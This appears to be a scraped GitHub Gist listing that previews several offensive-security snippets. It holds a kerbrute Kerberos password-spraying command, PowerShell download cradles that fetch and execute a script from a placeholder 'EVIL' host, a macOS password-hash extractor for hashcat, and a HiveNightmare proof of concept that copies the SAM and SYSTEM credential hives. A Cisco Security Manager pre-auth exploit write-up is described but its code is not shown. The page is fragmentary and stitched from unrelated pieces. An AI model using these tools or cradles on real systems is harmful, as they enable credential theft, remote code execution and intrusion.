With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Daniel Underhay dunderhay
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
teddziuba
/ osx_extract_hash.py
Last active
October 22, 2024 12:50
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Mac OSX Catalina User Password Hash Extractor | |
| Extracts a user's password hash as a hashcat-compatible string. | |
| Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
| (hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
| format, so previously reported methods for extracting the hash don't work. |
Frycos
/ CSM_pocs.md
Created
November 16, 2020 18:55
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
reigningshells
/ Invoke-HiveNightmare.ps1
Last active
February 7, 2024 20:47
Super simple PowerShell PoC for HiveNightmare / SeriousSam that copies SAM and SYSTEM hive shadow copies to C:\Users\Public\Documents
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-HiveNightmare | |
| { | |
| if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0) | |
| { | |
| Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam" | |
| } | |
| else | |
| { | |
| Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies" | |
| } |
LuemmelSec
/ Get-AppsWithFull_acces_as_appRole.ps1
Last active
February 16, 2024 04:16
Check for Apps that can read all user mailboxes and have no restricting access policy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Script to check which Apps have the "full_acces_as_app" EWS role, so can read all Mailboxes | |
| # There might be ApplicationAccessPolicies in place that afterwards restrict access to only certain mailboxes, so criticality would be reduced | |
| # This is reflected in the output as well. | |
| # This was written for PowerShell 7 - to work with PS v5 you need to exchange some modules and calls | |
| # Check if ExchangeOnlineManagement module is available | |
| $ExchangeOnlineModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable | |
| # Check if Az.Accounts module is available | |
| $AzAccountsModule = Get-Module -Name Az.Accounts -ListAvailable |